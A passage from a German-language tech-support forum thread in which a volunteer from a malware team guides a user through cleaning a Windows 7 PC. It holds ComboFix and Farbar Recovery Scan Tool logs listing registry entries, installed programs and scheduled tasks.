@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}" . [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}] @Denied: (A 2) (Everyone) @="IFlashBroker6" . [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}\ProxyStubClsid32] @="{00020424-0000-0000-C000-000000000046}" . [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}\TypeLib] @="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}" "Version"="1.0" . [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}] @Denied: (A 2) (Everyone) @="FlashBroker" "LocalizedString"="@c:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashUtil32_18_0_0_232_ActiveX.exe,-101" . [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\Elevation] "Enabled"=dword:00000001 . [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\LocalServer32] @="c:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashUtil32_18_0_0_232_ActiveX.exe" . [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\TypeLib] @="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}" . [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}] @Denied: (A 2) (Everyone) @="Shockwave Flash Object" . [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\InprocServer32] @="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_18_0_0_232.ocx" "ThreadingModel"="Apartment" . [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\MiscStatus] @="0" . [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ProgID] @="ShockwaveFlash.ShockwaveFlash.18" . [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32] @="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_18_0_0_232.ocx, 1" . [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\TypeLib] @="{D27CDB6B-AE6D-11cf-96B8-444553540000}" . [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\Version] @="1.0" . [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID] @="ShockwaveFlash.ShockwaveFlash" . [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}] @Denied: (A 2) (Everyone) @="Macromedia Flash Factory Object" . [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\InprocServer32] @="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_18_0_0_232.ocx" "ThreadingModel"="Apartment" . [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ProgID] @="FlashFactory.FlashFactory.1" . [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32] @="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_18_0_0_232.ocx, 1" . [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\TypeLib] @="{D27CDB6B-AE6D-11cf-96B8-444553540000}" . [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\Version] @="1.0" . [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID] @="FlashFactory.FlashFactory" . [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}] @Denied: (A 2) (Everyone) @="IFlashBroker6" . [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}\ProxyStubClsid32] @="{00020424-0000-0000-C000-000000000046}" . [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}\TypeLib] @="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}" "Version"="1.0" . [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\PCW\Security] @Denied: (Full) (Everyone) . ------------------------ Weitere laufende Prozesse ------------------------ . c:\program files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe c:\program files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe c:\program files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe c:\windows\SysWOW64\PnkBstrA.exe . ************************************************************************** . Zeit der Fertigstellung: 2015-09-21 18:38:38 - PC wurde neu gestartet ComboFix-quarantined-files.txt 2015-09-21 16:38 . Vor Suchlauf: 13 Verzeichnis(se), 73.854.971.904 Bytes frei Nach Suchlauf: 19 Verzeichnis(se), 75.190.906.880 Bytes frei . - - End Of File - - B840A83B98C11AB4375A0BE6C9BACBB0 A36C5E4F47E84449FF07ED3517B43A31 |
22.09.2015, 11:01 | #6 |
/// Malwareteam | Malware-gen, Adware-gen ...usw Hallo Zympop, danke, für Deine gute Mitarbeit bisher. Bitte bis zum Ende der Bereinigung keine Scans unaufgefordert durchführen und/oder Programme de-/installieren. Bitte folge den Anweisungen solange, bis ich dir deutlich sage, dass dein PC sauber ist! Nur weil die Symptome verschwunden sind, bedeutet das nicht, dass auch die Infektion entfernt ist! Danke dir! Schritt 1 Starte bitte wieder Malwarebytes Anti-Malware
Schritt 2 Bitte starte wieder FRST, setze den Haken bei Addition und drücke auf Untersuchen Bitte poste in deiner nächsten Antwort also:
__________________ --> Malware-gen, Adware-gen ...usw |
24.09.2015, 19:45 | #7 |
/// Malwareteam | Malware-gen, Adware-gen ...usw Hallo, benötigst Du noch weiterhin Hilfe ? Sollte ich innerhalb der nächsten 24 Stunden keine Antwort von dir erhalten, werde ich dein Thema aus meinen Abos nehmen und bekomme dadurch keine Nachricht über neue Antworten. Das Verschwinden der Symptome bedeutet nicht, dass dein System schon sauber ist
__________________ Mfg, Rafael ~ I'm storm. I'm calm. I'm fire. I'm ice. I'm burningice. ~ Unterstütze uns mit einer Spende ......... Lob, Kritik oder Wünsche ......... .......... Folge uns auf Facebook .......... |
26.09.2015, 11:57 | #8 |
| Malware-gen, Adware-gen ...usw Hallo Burning. vielen dank für deine hilfe bis jetzt =) Addition Code:
ATTFilter Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version:23-09-2015 durchgeführt von Kenny G (2015-09-23 05:00:52) Gestartet von C:\Users\Kenny G\Downloads Windows 7 Ultimate (X64) (2013-10-01 16:18:55) Start-Modus: Normal ========================================================== ==================== Konten: ============================= Administrator (S-1-5-21-682121585-3582832733-1082443493-500 - Administrator - Disabled) eLoot (S-1-5-21-682121585-3582832733-1082443493-1008 - Administrator - Enabled) => C:\Users\eLoot Gast (S-1-5-21-682121585-3582832733-1082443493-501 - Limited - Disabled) HomeGroupUser$ (S-1-5-21-682121585-3582832733-1082443493-1002 - Limited - Enabled) Kenny G (S-1-5-21-682121585-3582832733-1082443493-1000 - Administrator - Enabled) => C:\Users\Kenny G Tabea Studium (S-1-5-21-682121585-3582832733-1082443493-1009 - Limited - Enabled) => C:\Users\Tabea Studium UpdatusUser (S-1-5-21-682121585-3582832733-1082443493-1007 - Limited - Enabled) => C:\Users\UpdatusUser ==================== Sicherheits-Center ======================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.) AV: AVG Internet Security 2015 (Enabled - Up to date) {4D41356F-32AD-7C42-C820-63775EE4F413} AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} AS: AVG Internet Security 2015 (Enabled - Up to date) {F620D48B-1497-73CC-F290-58052563BEAE} FW: AVG Internet Security 2015 (Enabled) {757AB44A-78C2-7D1A-E37F-CA42A037B368} ==================== Installierte Programme ====================== (Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.) 888poker (HKLM-x32\...\888poker) (Version: - ) aborange Crypter - Deinstallation (HKLM-x32\...\aborange Crypter_is1) (Version: 3.10 - Mathias Gerlach [aborange.de]) Adobe Flash Player 18 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 18.0.0.232 - Adobe Systems Incorporated) Adobe Flash Player 18 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 18.0.0.232 - Adobe Systems Incorporated) Adobe Flash Player 18 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 18.0.0.232 - Adobe Systems Incorporated) Adobe Reader XI (11.0.12) - Deutsch (HKLM-x32\...\{AC76BA86-7AD7-1031-7B44-AB0000000001}) (Version: 11.0.12 - Adobe Systems Incorporated) Apple Application Support (HKLM-x32\...\{46F044A5-CE8B-4196-984E-5BD6525E361D}) (Version: 2.3.6 - Apple Inc.) Apple Mobile Device Support (HKLM\...\{2EF5D87E-B7BD-458F-8428-E4D0B8B4E65C}) (Version: 7.0.0.117 - Apple Inc.) Auslogics DiskDefrag (HKLM-x32\...\{DF6A13C0-77DF-41FE-BD05-6D5201EB0CE7}_is1) (Version: 4.4.2.0 - Auslogics Labs Pty Ltd) AVG 2015 (HKLM\...\AVG) (Version: 2015.0.6140 - AVG Technologies) AVG 2015 (Version: 15.0.4419 - AVG Technologies) Hidden AVG 2015 (Version: 15.0.6140 - AVG Technologies) Hidden AVG Web TuneUp (HKLM-x32\...\AVG Web TuneUp) (Version: 4.1.6.294 - AVG Technologies) Battle.net (HKLM-x32\...\Battle.net) (Version: - Blizzard Entertainment) Battlefield: Bad Company 2 (HKLM-x32\...\Steam App 24960) (Version: - DICE) Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.) CCleaner (HKLM\...\CCleaner) (Version: 4.06 - Piriform) CDBurnerXP (HKLM-x32\...\{7E265513-8CDA-4631-B696-F40D983F3B07}_is1) (Version: 4.5.5.5571 - CDBurnerXP) Cliqz (HKLM-x32\...\{5A0C0737-6AFE-4DC6-A8B4-6DFE509ACD75}_is1) (Version: 0.5.31 - Cliqz.com) Counter-Strike (HKLM-x32\...\Steam App 10) (Version: - Valve) Counter-Strike: Source (HKLM-x32\...\Steam App 240) (Version: - Valve) CyberGhost 5 (HKLM\...\CyberGhost 5_is1) (Version: - CyberGhost S.R.L.) DAEMON Tools Lite (HKLM\...\DAEMON Tools Lite) (Version: 10.1.0.0074 - Disc Soft Ltd) Free Alarm Clock 3.1.0 (HKLM-x32\...\{8ED5A2F1-338F-4608-8AF7-BCD1ADC1E1F7}_is1) (Version: 3.1 - Comfort Software Group) Free YouTube Download version 3.2.61.805 (HKLM-x32\...\Free YouTube Download_is1) (Version: 3.2.61.805 - DVDVideoSoft Ltd.) Free YouTube to MP3 Converter version 3.12.61.805 (HKLM-x32\...\Free YouTube to MP3 Converter_is1) (Version: 3.12.61.805 - DVDVideoSoft Ltd.) GIMP 2.8.10 (HKLM\...\GIMP-2_is1) (Version: 2.8.10 - The GIMP Team) Google Chrome (HKLM-x32\...\Google Chrome) (Version: 45.0.2454.93 - Google Inc.) Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden Google Update Helper (x32 Version: 1.3.28.15 - Google Inc.) Hidden Hearthstone (HKLM-x32\...\Hearthstone) (Version: - Blizzard Entertainment) ICQ 8.2 (build 6901) (HKU\S-1-5-21-682121585-3582832733-1082443493-1000\...\ICQ) (Version: 8.2.6901.0 - ICQ) ICQ 8.2 (build 6901) (HKU\S-1-5-21-682121585-3582832733-1082443493-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\ICQ) (Version: 8.2.6901.0 - ICQ) iTunes (HKLM\...\{A535111D-95C8-487F-869E-CE4C239972D2}) (Version: 11.1.1.11 - Apple Inc.) Java 7 Update 45 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83217021FF}) (Version: 7.0.450 - Oracle) JetBoost (HKLM-x32\...\JetBoost_is1) (Version: 2.0.0 - BlueSprig) League of Legends (HKLM-x32\...\League of Legends 3.0.1) (Version: 3.0.1 - Riot Games ) League of Legends (x32 Version: 3.0.1 - Riot Games ) Hidden LibreOffice 4.2.2.1 (HKLM-x32\...\{0ECDB550-79ED-4E9E-851B-19A8B2B4EBFA}) (Version: 4.2.2.1 - The Document Foundation) Malwarebytes Anti-Malware Version 2.1.8.1057 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.1.8.1057 - Malwarebytes Corporation) Microsoft .NET Framework 4 Client Profile (HKLM\...\Microsoft .NET Framework 4 Client Profile) (Version: 4.0.30319 - Microsoft Corporation) Microsoft .NET Framework 4 Client Profile DEU Language Pack (HKLM\...\Microsoft .NET Framework 4 Client Profile DEU Language Pack) (Version: 4.0.30319 - Microsoft Corporation) Microsoft .NET Framework 4 Extended (HKLM\...\Microsoft .NET Framework 4 Extended) (Version: 4.0.30319 - Microsoft Corporation) Microsoft .NET Framework 4 Extended DEU Language Pack (HKLM\...\Microsoft .NET Framework 4 Extended DEU Language Pack) (Version: 4.0.30319 - Microsoft Corporation) Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.40728.0 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{7f51bdb9-ee21-49ee-94d6-90afc321780e}) (Version: 12.0.21005.1 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM-x32\...\{ce085a78-074e-4823-8dc1-8a721b94b76d}) (Version: 12.0.21005.1 - Microsoft Corporation) Mozilla Firefox 40.0.3 (x86 de) (HKLM-x32\...\Mozilla Firefox 40.0.3 (x86 de)) (Version: 40.0.3 - Mozilla) Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 40.0.3.5716 - Mozilla) Mozilla Thunderbird 24.6.0 (x86 de) (HKLM-x32\...\Mozilla Thunderbird 24.6.0 (x86 de)) (Version: 24.6.0 - Mozilla) Native Instruments Audio 2 DJ Driver (HKLM-x32\...\Native Instruments Audio 2 DJ Driver) (Version: - Native Instruments) Native Instruments Audio 4 DJ Driver (HKLM-x32\...\Native Instruments Audio 4 DJ Driver) (Version: - Native Instruments) Native Instruments Audio 8 DJ Driver (HKLM-x32\...\Native Instruments Audio 8 DJ Driver) (Version: - Native Instruments) Native Instruments Controller Editor (HKLM-x32\...\Native Instruments Controller Editor) (Version: 1.8.2.281 - Native Instruments) Native Instruments Service Center (HKLM-x32\...\Native Instruments Service Center) (Version: 2.6.0.137 - Native Instruments) Native Instruments Traktor (HKLM-x32\...\Native Instruments Traktor) (Version: - Native Instruments) Native Instruments Traktor 2 (HKLM-x32\...\Native Instruments Traktor 2) (Version: 2.9.0.1257 - Native Instruments) Native Instruments Traktor Audio 2 Driver (HKLM-x32\...\Native Instruments Traktor Audio 2 Driver) (Version: - Native Instruments) Native Instruments Traktor Audio 2 MK2 Driver (HKLM-x32\...\Native Instruments Traktor Audio 2 MK2 Driver) (Version: - Native Instruments) Native Instruments Traktor Audio 6 Driver (HKLM-x32\...\Native Instruments Traktor Audio 6 Driver) (Version: - Native Instruments) Native Instruments Traktor Kontrol D2 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol D2 Driver) (Version: - Native Instruments) Native Instruments Traktor Kontrol F1 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol F1 Driver) (Version: - Native Instruments) Native Instruments Traktor Kontrol S2 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol S2 Driver) (Version: - Native Instruments) Native Instruments Traktor Kontrol S2 MK2 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol S2 MK2 Driver) (Version: - Native Instruments) Native Instruments Traktor Kontrol S4 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol S4 Driver) (Version: - Native Instruments) Native Instruments Traktor Kontrol S4 MK2 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol S4 MK2 Driver) (Version: - Native Instruments) Native Instruments Traktor Kontrol S8 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol S8 Driver) (Version: - Native Instruments) Native Instruments Traktor Kontrol X1 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol X1 Driver) (Version: - Native Instruments) Native Instruments Traktor Kontrol X1 MK2 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol X1 MK2 Driver) (Version: - Native Instruments) Native Instruments Traktor Kontrol Z1 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol Z1 Driver) (Version: - Native Instruments) Native Instruments Traktor Kontrol Z2 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol Z2 Driver) (Version: - Native Instruments) NVIDIA 3D Vision Controller-Treiber 331.65 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 331.65 - NVIDIA Corporation) NVIDIA 3D Vision Treiber 331.65 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 331.65 - NVIDIA Corporation) NVIDIA Grafiktreiber 331.65 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 331.65 - NVIDIA Corporation) NVIDIA PhysX-Systemsoftware 9.13.0725 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.13.0725 - NVIDIA Corporation) NVIDIA Virtual Audio 1.2.9 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_VirtualAudio.Driver) (Version: 1.2.9 - NVIDIA Corporation) Opera Stable 32.0.1948.25 (HKLM-x32\...\Opera 32.0.1948.25) (Version: 32.0.1948.25 - Opera Software) Pidgin (HKLM-x32\...\Pidgin) (Version: 2.10.7 - ) pidgin-otr 4.0.0-1 (HKLM-x32\...\pidgin-otr) (Version: 4.0.0-1 - Cypherpunks CA) Poker 770 (HKLM-x32\...\Poker 770) (Version: - ) PokerStars.eu (HKLM-x32\...\PokerStars.eu) (Version: - PokerStars.eu) Project 64 version 2.1.0.1 (HKLM-x32\...\Project 64_is1) (Version: 2.1.0.1 - ) SHIELD Streaming (Version: 1.6.34 - NVIDIA Corporation) Hidden Skype™ 6.11 (HKLM-x32\...\{4E76FF7E-AEBA-4C87-B788-CD47E5425B9D}) (Version: 6.11.102 - Skype Technologies S.A.) SleepTimer Ultimate 1.2 (HKLM-x32\...\{0EE56463-49B2-45E1-B74F-3E0139DBC986}_is1) (Version: - Christian Handorf) Sony Mobile Update Engine (HKLM-x32\...\Update Engine) (Version: 2.13.13.201311261136 - Sony Mobile Communications AB) Sony PC Companion 2.10.188 (HKLM-x32\...\{F09EF8F2-0976-42C1-8D9D-8DF78337C6E3}) (Version: 2.10.188 - Sony) Steam (HKLM-x32\...\{048298C9-A4D3-490B-9FF9-AB023A9238F3}) (Version: 1.0.0.0 - Valve Corporation) TAP-Windows 9.9.2 (HKLM\...\TAP-Windows) (Version: 9.9.2 - ) TeamSpeak 3 Client (HKLM-x32\...\TeamSpeak 3 Client) (Version: 3.0.16 - TeamSpeak Systems GmbH) TrackMania United (HKLM-x32\...\Steam App 7200) (Version: - Nadeo) TrueCrypt (HKLM-x32\...\TrueCrypt) (Version: 7.1a - TrueCrypt Foundation) Visual Studio 2012 x64 Redistributables (HKLM\...\{8C775E70-A791-4DA8-BCC3-6AB7136F4484}) (Version: 14.0.0.1 - AVG Technologies) Visual Studio 2012 x86 Redistributables (HKLM-x32\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.) VLC media player 2.1.0 (HKLM-x32\...\VLC media player) (Version: 2.1.0 - VideoLAN) VNC Viewer 5.1.0 (HKLM\...\{8F29CFF4-4A54-4C34-8905-B74527DE93C8}) (Version: 5.1.0 - RealVNC Ltd) Web Companion (HKLM-x32\...\{99640eec-4d74-4df5-95f4-719dc27de6a8}) (Version: 2.0.1025.2130 - Lavasoft) Webocton - Scriptly 0.8.95.6 (HKLM-x32\...\Webocton - Scriptly_is1) (Version: 0.8.95.6 - Webocton) William Hill Poker (HKLM-x32\...\William Hill Poker) (Version: - ) WinRAR 5.01 (64-Bit) (HKLM\...\WinRAR archiver) (Version: 5.01.0 - win.rar GmbH) World of Warcraft (HKLM-x32\...\World of Warcraft) (Version: - Blizzard Entertainment) Wuala (HKU\S-1-5-21-682121585-3582832733-1082443493-1000\...\Wuala) (Version: 1.0.444.0 - LaCie) Wuala (HKU\S-1-5-21-682121585-3582832733-1082443493-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Wuala) (Version: 1.0.444.0 - LaCie) Wuala CBFS (HKLM-x32\...\Wuala CBFS) (Version: 3.2.107.0 - LaCie) Wuala OverlayIcons (HKLM-x32\...\Wuala OverlayIcons) (Version: 1.0.0.2 - LaCie) Xilisoft iPhone Magic (HKLM-x32\...\Xilisoft iPhone Magic) (Version: 5.7.5.20150727 - Xilisoft) ==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ========================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) ==================== Wiederherstellungspunkte ========================= 19-09-2015 12:22:08 Gerätetreiber-Paketinstallation: Disc Soft Ltd Speichercontroller 19-09-2015 12:25:24 Installed Microsoft Office Professional Plus 2013 19-09-2015 12:25:49 PROPLUS 19-09-2015 12:38:57 Installed Microsoft Office Professional Plus 2013 19-09-2015 12:39:23 PROPLUS 19-09-2015 15:39:41 Installed Microsoft PowerPoint MUI (English) 2013 19-09-2015 15:40:31 Installed Microsoft PowerPoint MUI (English) 2013 19-09-2015 15:55:13 Installed Microsoft Office Professional Plus 2013 19-09-2015 15:56:35 PROPLUS 19-09-2015 16:15:26 Windows Update 20-09-2015 18:01:04 JRT Pre-Junkware Removal ==================== Hosts Inhalt: =============================== (Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.) 2009-07-14 04:34 - 2015-09-21 18:32 - 00000027 ____A C:\Windows\system32\Drivers\etc\hosts 127.0.0.1 localhost ==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) ============= (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) Task: {0D1A705F-BC57-4C56-9001-41F179ED8A24} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2013-09-19] (Piriform Ltd) Task: {2C62D752-B42F-4EBB-9A9B-8F3648694368} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_18_0_0_232_pepper.exe [2015-08-13] (Adobe Systems Incorporated) Task: {2D33A450-57FF-4A00-AE28-E87E56431EBE} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2014-12-19] (Adobe Systems Incorporated) Task: {4E8F7D37-0852-4EDC-861C-E3D03ECBABA7} - System32\Tasks\Opera scheduled Autoupdate 1438940281 => C:\Program Files (x86)\Opera\launcher.exe [2015-09-11] (Opera Software) Task: {69CAC2C9-9E20-47E3-9AAC-5005640B912E} - System32\Tasks\GoogleUpdateTaskMachineCore1d0925912504720 => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.) Task: {6D06CB31-009E-45FA-A9FE-85EEEF758F7C} - System32\Tasks\Adobe Reader and Acrobat Manager => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2014-12-19] (Adobe Systems Incorporated) Task: {6D47D039-18B5-44B4-8059-2A192F7A2F7E} - System32\Tasks\GoogleUpdateTaskMachineUA1d0925912f22c70 => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.) Task: {80ACD03E-D8E8-47EB-B041-F165F30E230D} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.) Task: {9200AA28-5EB6-4EAD-BF4E-CDF0410B5CF9} - System32\Tasks\{A3BB51D3-1E67-46C5-8ED5-8734DECD6918} => Chrome.exe hxxp://www.skype.com/go/downloading?source=lightinstaller&ver=5.3.0.111.261&LastError=404 Task: {A23C2641-27E1-4303-8187-0DBF0233649C} - System32\Tasks\JetBoost_AutoUpdate => C:\Program Files (x86)\BlueSprig\JetBoost\AutoUpdate.exe [2012-11-27] (BlueSprig) Task: {B304FCBA-F8AD-455F-95F7-BBA64D8987AB} - System32\Tasks\GoogleUpdateTaskMachineUA1d00016545d4e90 => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.) Task: {B4A8F9FA-04C0-40CF-95EB-AE47E2BB4073} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office15\OLicenseHeartbeat.exe Task: {C1019F60-C40C-40F9-99E0-A20254841B65} - System32\Tasks\{AFE2C666-2C4F-49BB-B86B-2CC7B241F441} => pcalua.exe -a "C:\Users\Kenny G\Desktop\bewerbung\bitdefender_isecurity.exe" -d "C:\Users\Kenny G\Desktop\bewerbung" Task: {C4EDDEAE-BCF6-49B9-A64D-CACA20F51E9E} - System32\Tasks\GoogleUpdateTaskMachineCore1d04548885af2c0 => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.) Task: {C7A41BF4-00C0-4FC0-A9C1-22B5B9F7ACC5} - System32\Tasks\{7AD56248-245F-4D20-B2FB-3A38DD4D9679} => pcalua.exe -a "C:\Program Files (x86)\InstallShield Installation Information\{0FBD9ABF-7DA0-463E-A7DC-A394052CC9A8}\Setup.exe" -c -runfromtemp -l0x0407 -removeonly Task: {CB8F7966-49EF-42D7-B59C-81E070B86191} - System32\Tasks\GoogleUpdateTaskMachineUA1d0454889312e80 => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.) Task: {EFCA144A-E45A-4877-8FAD-E51248235D56} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.) 